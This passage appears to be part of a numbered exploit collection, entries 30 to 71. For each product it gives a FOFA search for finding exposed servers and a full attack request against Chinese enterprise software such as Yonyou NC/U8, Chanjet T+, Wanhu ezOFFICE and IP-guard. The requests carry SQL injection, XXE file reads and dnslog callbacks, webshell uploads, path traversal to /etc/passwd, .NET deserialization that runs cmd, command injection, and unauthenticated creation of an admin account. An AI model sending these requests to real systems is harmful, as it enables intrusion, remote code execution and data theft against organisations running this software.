User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Uploaded file path:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
<soapenv:Header/>
 <soapenv:Body>
 <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
 </ser:getUserNameById>
</soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud (government finance cloud) arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Uploaded file path:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver (泛微) E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech (迪普) VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
 "storeID":{
 "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
 "MethodName":"Start",
 "ObjectInstance":{
 "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
 "StartInfo":{
 "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
 "FileName":"cmd",
 "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
 }
 }
 }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet (畅捷通) T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet (畅捷通) T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
 "storeID":{
 "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
 "MethodName":"Start",
 "ObjectInstance":{
 "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
 "StartInfo": {
 "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
 "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
 }
 }
 }
}

57. Chanjet (畅捷通) T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet (畅捷通) T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetOSpById xmlns="http://tempuri.org/">
<sId>1';waitfor delay '0:0:5'--+</sId>
</GetOSpById>
</soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The vulnerability is confirmed if lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9.

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
